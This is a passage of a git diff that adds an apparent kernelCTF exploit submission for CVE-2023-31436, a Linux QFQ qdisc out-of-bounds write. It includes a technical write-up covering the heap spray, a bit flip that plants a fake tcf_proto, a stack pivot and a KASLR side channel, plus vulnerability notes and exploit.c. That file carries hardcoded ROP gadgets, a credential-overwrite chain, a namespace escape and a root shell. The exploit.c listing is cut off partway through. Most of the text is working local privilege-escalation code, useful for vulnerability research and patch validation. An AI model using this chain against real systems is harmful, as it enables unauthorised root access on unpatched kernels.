| | x | | +| | | x flip | | ++--------------+ | x a bit +-----------+ + | x ++-qfq qdisc----+ | x--------------> 0280 +-fake obj--+ +| ... | | | | +| filter_list | --------+ | | +| ... | +-----------+ +| bitmaps[] | +| groups[] | 0300 +-fake obj--+ +| ... | | | ++--------------+ | | + +-----------+ +``` + +By targeting a bit of the `filter_list` member of the qdisc after the user controlled +object we will potentially be able to inject a malicious `struct tcf_proto` object +into the qdisc. +This object can be abused for trivial RIP control via the `classify()` member, +which will be called in `qfq_enqueue`. + +```c +// in include/net/sch_generic.h + +struct tcf_proto { + /* Fast access part */ + struct tcf_proto __rcu *next; + void __rcu *root; + + /* called under RCU BH lock*/ + int (*classify)(struct sk_buff *, + const struct tcf_proto *, + struct tcf_result *); + __be16 protocol; + + /* All the rest */ + u32 prio; + void *data; + const struct tcf_proto_ops *ops; + struct tcf_chain *chain; + /* Lock protects tcf_proto shared state and can be used by unlocked + * classifiers to protect their private data. + */ + spinlock_t lock; + bool deleting; + refcount_t refcnt; + struct rcu_head rcu; + struct hlist_node destroy_ht_node; +}; +``` + +### Step 1.1: QFQ Internal State Control + +Looking at the code in `qfq_change_class()` we can see that `qfq_add_to_agg()` +is called with the new `agg`: + +```c +// net/sched/sch_qfq.c + +/* Add class to aggregate. */ +static void qfq_add_to_agg(struct qfq_sched *q, + struct qfq_aggregate *agg, + struct qfq_class *cl) +{ + cl->agg = agg; + + qfq_update_agg(q, agg, agg->num_classes+1); // [1] + if (cl->qdisc->q.qlen > 0) { /* adding an active class */ + list_add_tail(&cl->alist, &agg->active); + if (list_first_entry(&agg->active, struct qfq_class, alist) == + cl && q->in_serv_agg != agg) /* agg was inactive */ + qfq_activate_agg(q, agg, enqueue); /* schedule agg */ // [2] + } +} +``` + +After the out-of-bound group is stored into the aggregate in [1] we can +hit `qfq_activate_agg()` [2]. + +```c +/* Update agg ts and schedule agg for service */ +static void qfq_activate_agg(struct qfq_sched *q, struct qfq_aggregate *agg, + enum update_reason reason) +{ + agg->initial_budget = agg->budget = agg->budgetmax; /* recharge budg. */ + + qfq_update_agg_ts(q, agg, reason); + if (q->in_serv_agg == NULL) { /* no aggr. in service or scheduled */ + q->in_serv_agg = agg; /* start serving this aggregate */ + /* update V: to be in service, agg must be eligible */ + q->oldV = q->V = agg->S; + } else if (agg != q->in_serv_agg) + qfq_schedule_agg(q, agg); // [3] +} +``` + +After passing the checks in `qfq_activate_agg()` we will call the desired +`qfq_schedule_agg()` [3]. + +In order to hit these code paths we need to fullfill certain constraints: +1. `q->in_serv_agg != NULL` and `q->in_serv_agg != new_oob_agg` +2. (sub) qdisc of the owning class of the aggregate needs to be non-empty (`cl->qdisc->q.qlen > 0`) + +We can control `q->in_serv_agg` by enqueuing packets: +```c +static int qfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ +// ... + qfq_activate_agg(q, agg, enqueue); +// ... +} +``` +Initially `q->in_serv_agg` will be `NULL`, thus we will hit the second branch +in `qfq_activate_agg()` (see above). + +The problem is that, right after enqueuing the packet, the dequeue operation +will reset the state (unless we generate enormous amounts of traffic so that +the scheduling actually kicks in, which however still leaves us with a race). 
+In order to work around that problem we will modify the sub qdisc of the class
+to be a `netem` qdisc, which allows us to add a generously chosen delay, so that
+the dequeue operation fails because no packet is available yet.
+This will issue a warning in `qfq_peek_skb()`, but that will not be a problem for us.
+
+This solves constraint number one. As a bonus it naturally solves constraint
+number two as well, because the underlying netem qdisc does in fact have packets
+queued; they are just delayed.
+
+## Step 2: Heap Spray
+
+### Step 2.1: QFQ qdiscs and `dyn-kmalloc-8192`
+
+To successfully make use of the vulnerability we need a controllable object in
+the `dyn-kmalloc-8192` cache.
+
+The qdisc is allocated by `qdisc_alloc()`:
+```c
+// qdisc_alloc() in net/sched/sch_generic.c
+    struct Qdisc *sch;
+
+// ..
+
+    dev = dev_queue->dev;
+    sch = kzalloc_node(size, GFP_KERNEL, netdev_queue_numa_node_read(dev_queue));
+```
+
+This size is a) not a compile-time constant and b) allocated with `GFP_KERNEL`,
+so we need an object which satisfies both properties as well.
+
+I chose `struct qdisc_size_table`, as it has all of those properties:
+```c
+// qdisc_get_stab() in net/sched/sch_api.c
+
+    struct qdisc_size_table *stab;
+// ..
+    stab = kmalloc(struct_size(stab, data, tsize), GFP_KERNEL);
+```
+To get the desired layout, we will allocate one sizetable alongside each qdisc we
+spray. This way we hopefully obtain the desired alternating layout.
+One should note that the sprayed sizetables must not all be equal; identical
+sizetables are shared, so no new allocation would be made.
+
+In order to spray the qdiscs we will create child processes, each with a new
+network namespace to isolate its qdisc.
+
+### Step 2.2: `struct tcf_proto`s and `kmalloc-128`
+
+As mentioned earlier, we will try to modify the `q->filter_list` member so that it
+points to a nearby user controlled object.
+`struct tcf_proto` is allocated in `kmalloc-128` with `GFP_KERNEL`, so we need a
+statically sized object with similar allocation properties.
+
+I found [XDP](https://www.kernel.org/doc/html/latest/networking/af_xdp.html) to be
+very useful for this. Specifically we will use `struct xdp_umem` for this purpose,
+as the `void *addrs` member overlays perfectly with the `struct tcf_proto __rcu *next`
+member of `struct tcf_proto`:
+
+```c
+// in include/net/xdp_sock.h, size = 112 bytes
+
+struct xdp_umem {
+    void *addrs;
+    u64 size;
+    u32 headroom;
+    u32 chunk_size;
+    u32 chunks;
+    u32 npgs;
+    struct user_struct *user;
+    refcount_t users;
+    u8 flags;
+    bool zc;
+    struct page **pgs;
+    int id;
+    struct list_head xsk_dma_list;
+    struct work_struct work;
+};
+```
+
+This structure is a nice primitive, as it allows us to create arbitrary kernel objects.
+Furthermore we get arbitrary read / write access to the created kernel objects, should
+we ever need it.
+XDP allows the creation of shared memory buffers between kernel and userspace.
+When creating the `AF_XDP` socket and registering the shared memory through `setsockopt()`,
+the `addrs` member will be mapped directly to the userspace buffer.
+Any code dereferencing this address will therefore use our controlled buffer.
+This fits perfectly onto our `struct tcf_proto`, whose first member implements a
+simple forward list.
+
+In order to spray those objects, we will simply create many `AF_XDP` sockets and
+register memory for each of them.
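+
+For illustration, here is a minimal sketch of this spray primitive. The full
+exploit below implements it as `spray_one_umem()`; the helper name used here and
+the omitted error handling are mine:
+
+```c
+#include <stdint.h>
+#include <sys/socket.h>
+#include <linux/if_xdp.h>
+
+// Registering a UMEM makes the kernel allocate a struct xdp_umem
+// (112 bytes -> kmalloc-128) whose first member, addrs, ends up pointing
+// at a kernel mapping of our pages: a fake tcf_proto whose contents we
+// fully control from userspace.
+// user_payload must be a page-aligned (e.g. mmap'd) buffer of >= len bytes.
+static int spray_fake_tcf_proto(void *user_payload)
+{
+    struct xdp_umem_reg mr = {
+        .addr = (uint64_t)user_payload,
+        .len = 4 * 0x1000,
+        .chunk_size = 0x1000, // power of two in [2048, PAGE_SIZE]
+    };
+
+    int s = socket(AF_XDP, SOCK_RAW, 0); // needs CAP_NET_RAW (via userns)
+    if (s < 0)
+        return -1;
+    if (setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0)
+        return -1;
+    return s; // keep the socket open so the xdp_umem stays allocated
+}
+```
+
+Each successful call pins one more `xdp_umem` into `kmalloc-128`, so calling this
+in a loop floods the cache around the sprayed `tcf_proto` objects.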
+
+## Step 3: Getting RIP Control
+
+By constructing a fake `struct tcf_proto` object with a suitable `classify` member
+we are well on our way to gaining arbitrary kernel code execution:
+
+```c
+// in net/sched/sch_qfq.c
+static struct qfq_class *qfq_classify(struct sk_buff *skb, struct Qdisc *sch,
+                                      int *qerr)
+{
+    struct qfq_sched *q = qdisc_priv(sch);
+    struct tcf_proto *fl;
+// ..
+    fl = rcu_dereference_bh(q->filter_list);
+    result = tcf_classify(skb, NULL, fl, &res, false);
+// ..
+}
+
+// in net/sched/cls_api.c
+static inline int __tcf_classify(struct sk_buff *skb,
+                                 const struct tcf_proto *tp,
+                                 const struct tcf_proto *orig_tp,
+                                 struct tcf_result *res,
+                                 bool compat_mode,
+                                 u32 *last_executed_chain)
+{
+// ..
+    for (; tp; tp = rcu_dereference_bh(tp->next)) {
+        __be16 protocol = skb_protocol(skb, false);
+        int err;
+
+        if (tp->protocol != protocol &&
+            tp->protocol != htons(ETH_P_ALL))
+            continue;
+
+        err = tp->classify(skb, tp, res);
+// ..
+}
+```
+
+Even though we created a fake object for `kmalloc-128`, we do not have any real size
+restrictions on the payload.
+`tp->classify` is called with the `tp` object as its second parameter (in `rsi`),
+which makes it a perfect candidate for a stack pivot onto the fake object.
+
+One downside of the chosen entrypoint into the kernel is the fact that we are in
+interrupt context, so we cannot simply return to usermode naively.
+To overcome this issue we restore the execution right at the end of `qfq_enqueue`,
+so that the kernel deals with this problem on its own.
+Right as we enter, `rbp` contains a stack pointer.
+We copy this pointer to a safe location in memory and eventually restore the stack frame.
+
+Besides that, we construct a common privilege escalation payload.
+
+# KASLR Bypass
+
+The exploit itself only performs a single bit write; we did not construct any leak
+primitives.
+In order to get a kernel pointer to bypass KASLR, we adapt timing side channels
+for simplicity.
+As long as PTI is not enabled, this works very well in practice.
+
+The code for that is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
+
+# General Notes on the Exploit
+
+The exploit makes heavy use of multiprocessing in order to simplify the use
+of the network namespaces (recall that we use one network namespace for each QFQ
+qdisc we create).
+
+The main function coordinates the child processes.
+The children notify the parent through a simple wait-based event system.
+Qdiscs and the spraying of fake classifiers are handled by child workers in
+`bug_worker()`.
+We select one of those workers to trigger the vulnerability; the others
+will try to trigger RIP control.
+If the bit flip failed, we will notice because we did not gain root privileges.
+Beyond that, nothing is left in an unstable state and we can try again.
+
+Finally, note that the exploit does not make use of any netlink library or the
+like. Therefore, you may notice that the code related to netlink is quite verbose
+(maybe I did not know how to use the libraries).
+
+## Stability
+
+The main stability problem is the initial heap spray, where we try to achieve a
+three-way aligned layout in `dyn-kmalloc-8192`.
+In order to improve the reliability of this step, we pin the orchestration to a
+dedicated CPU while the workers (which perform the spray) are pinned to another
+one.
+This greatly increases the likelihood of hitting the correct layout; however,
+the chances are still quite low (~10%).
+
+Overall this contributes to an observed stability of about 5%.
+
+Finally, one should note that the exploit does not perform a thorough
+post-exploitation cleanup.
+The QFQ qdisc class which triggered the vulnerability is not properly cleaned up;
+as soon as the timers for dequeue operations fire, the kernel will likely
+panic.
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md
new file mode 100644
index 00000000..1164f50e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/novel-techniques.md
@@ -0,0 +1,19 @@
+As far as I am aware, data-only attacks on the kernel heap using kernel/user shared
+memory have gained little to no attention yet.
+
+The `struct xdp_umem` with the `AF_XDP` socket ([docs](https://www.kernel.org/doc/html/latest/networking/af_xdp.html))
+used in this exploit seems to serve as a powerful primitive.
+
+Advantages:
+- Read / write of "kernel" memory without restrictions (even fault shenanigans seem like a good idea,
+  though I did not explicitly look into this)
+- No heap pointers required
+- No size restrictions, even though it acts as a `kmalloc-128` object
+- Very useful as a "fake list member"
+
+Disadvantages:
+- One level of pointer indirection
+- Initial pointer restricted to `kmalloc-128`
+- Requires `CAP_NET_RAW`
+
+Depending on the primitives available, unaligned pointer corruption may come in handy
+when dealing with objects where the mapped member does not align with the desired pointer.
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..ad1842fe
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/vulnerability.md
@@ -0,0 +1,74 @@
+Vulnerability Details
+=====================
+
+CVE-2023-31436: qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.
+
+This vulnerability affects the packet scheduler subsystem, specifically QFQ+.
+
+An attacker can utilize this vulnerability to cause a slab-out-of-bounds read/write in the `(dyn-)kmalloc-8192` cache.
+
+## Requirements
+
+A user needs to be able to modify qdiscs, thus requiring `CAP_NET_ADMIN`.
+Naturally this will be obtained through user namespaces, so `CONFIG_USER_NS` may be required as well.
+
+The specific qdisc in question is QFQ, which needs to be enabled (`CONFIG_NET_SCH_QFQ`).
+
+## History
+
+The fixing commit is https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d.
+This is a fix for 3015f3d2a3cd ("pkt_sched: enable QFQ to support TSO/GSO"), which dates way back to 2011.
+Based on this I assume 2.6.x+ is affected.
+
+## Triggering the Vulnerability
+
+In order to trigger the vulnerability, an attacker needs to modify qfq classes
+after modifying the MTU of the device to a large value (> 0x100000).
+This can be trivially achieved for the loopback device.
+
+When changing a class and omitting the `TCA_QFQ_LMAX` option, the `lmax` value is chosen according to the MTU of the device, without any additional checks [1]:
+```c
+// qfq_change_class() in net/sched/sch_qfq.c
+
+// ..
+ if (tb[TCA_QFQ_LMAX]) { + lmax = nla_get_u32(tb[TCA_QFQ_LMAX]); + if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) { + pr_notice("qfq: invalid max length %u\n", lmax); + return -EINVAL; + } + } else + lmax = psched_mtu(qdisc_dev(sch)); // [1] + +// .. + + qfq_init_agg(q, new_agg, lmax, weight); // [2] + } + +// .. + + qfq_add_to_agg(q, new_agg, cl); // [3] +``` + +`qfq_init_agg` will then set `new_agg->lmax` accordingly. +Eventually `qfq_add_to_agg()` [3] will initialize `new_agg->grp` when the call tree +reaches `qfq_update_agg()`: + +```c +// qfq_update_agg() in net/sched/sch_qfq.c + agg->budgetmax = new_num_classes * agg->lmax; + new_agg_weight = agg->class_weight * new_num_classes; + agg->inv_w = ONE_FP/new_agg_weight; + + if (agg->grp == NULL) { + int i = qfq_calc_index(agg->inv_w, agg->budgetmax, + q->min_slot_shift); + agg->grp = &q->groups[i]; // [4] + } +``` + +`qfq_calc_index()` performs some simple arithmetics to choose the final value, +but will not do any additional bounds checks. +Eventually this results in `agg->grp` pointing out-of-bounds [4] relative to the `q` object of type `struct qfq_sched` (in the `kmalloc-8192` cache). + +The group of the `qfq_aggregate` is used in several places, leading to OOB reads and writes. diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..d45a7b07 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./bin/exploit diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..ac81ef57 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..153e3534 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,1123 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) 
printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { +u64 find_task_by_vpid = 0xffffffff8110a0d0; +u64 switch_task_namespaces = 0xffffffff81111c80; +u64 commit_creds = 0xffffffff811136f0; +u64 prepare_kernel_cred = 0xffffffff811139d0; +u64 init_task = 0xffffffff836159c0; +u64 init_nsproxy = 0xffffffff83661680; +u64 oops_in_progress = 0xffffffff8419f478; +u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3 +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 + +u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3 +u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3 + +u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3 +// -> rbx = rbp, pop rbp, pop r12 +u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3 +u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3 + +// trailer of qfq_enqueue +// 0xffffffff81cd460f <+591>: lea -0x28(%rbp),%rsp +// 0xffffffff81cd4613 <+595>: mov %ecx,%eax +// 0xffffffff81cd4615 <+597>: pop %rbx +// 0xffffffff81cd4616 <+598>: pop %r12 +// 0xffffffff81cd4618 <+600>: pop %r13 +// 0xffffffff81cd461a <+602>: pop %r14 +// 0xffffffff81cd461c <+604>: pop %r15 +// 0xffffffff81cd461e <+606>: pop %rbp +// 0xffffffff81cd461f <+607>: jmp 0xffffffff82404440 <__x86_return_thunk> +u64 leave = 0xffffffff81cd460f; + +u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(oops_in_progress); \ + 
x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp); \ + x(add_rsp_0x88); \ + x(enter_pop_rbx_pop_rbp_pop_r12); \ + x(mov_rbp_rbx_pop_rbx_pop_rbp); \ + x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \ + x(leave); \ + x(add_rcx_edi); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. +#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SIZEOF_QDISC_SIZE_TABLE 60 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct tcf_proto { + void* next; /* 0 8 */ + void * root; /* 8 8 */ + int (*classify)(void*, const struct tcf_proto *, void*); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + void * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto) == 104); + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +struct stab_payload { + u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE]; + struct qfq_group group; + u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4]; + u32 id; +} PACK; +_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE); + +// Our fake tcf_proto we will place into qfq_sched->filter_list +struct tcf_proto_payload { + union { + struct tcf_proto org; + u64 stack[100]; + }; +} PACK; + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +static u64 leak_kernel_base = 0; + +static void* payload = NULL; +static struct stab_payload fake_group = {0}; + +int get_kernel_base(); + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif + +void maybe_win() { + int fd = open("/proc/1/ns/mnt", O_RDONLY); + if (fd < 0) { + return; + } + + L("SUCCESS."); + setns(fd, 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); 
+ setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + char* argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(argv[0], argv, NULL); + exit(1); +} + + +void prep_tcf_proto_payload(struct tcf_proto_payload* p) { + memset(p, 0, sizeof(*p)); + + // store framepointer at a sane address. + const u64 framepp = oops_in_progress; + + u8 rop[] = { + [0] = p64(add_rsp_0x88), + + [0x39] = p64(pop_rsp), + + [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12), + p64(framepp), + p64(0xdead000000000001), // scratch r12 + p64(mov_rbp_rbx_pop_rbx_pop_rbp), + p64(0xdead000000000002), // scratch rbx + p64(0xdead000000000003), // scratch rbp + p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + // restore execution in qfq_enqueue + p64(pop_rcx_ret), + p64(framepp), + p64(pop_rdi), + p64(0x48), + p64(add_rcx_edi), + p64(pop_rsi), + p64(-0x5b), + p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12), + p64(0xdead000000000004), // scratch r12 + p64(leave), + }; + + _Static_assert(sizeof(rop) < sizeof(p->stack)); + memcpy(p->stack, rop, sizeof(rop)); + + p->org.protocol = 8; + p->org.classify = (void*)push_rsi_jmp_rsi_0x39; + p->org.ops = (void*)0xdead000000000000; +} + +void prep_stage1_large_payload(struct stab_payload* p) { + memset(p, 0, sizeof(*p)); + + // This index will control the bit we flip. 
+ // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps)) // the rest of the first qdisc + // + 8192 // spacing of key payload + // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list) // offset into the second qdisc + // (times 8 + FFS(0x80)) + p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + } + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +static volatile int wake = 0; +static volatile int done = 0; +static volatile int qdisc_trigger_bug = 0; +static volatile int qdisc_trigger_payload = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + 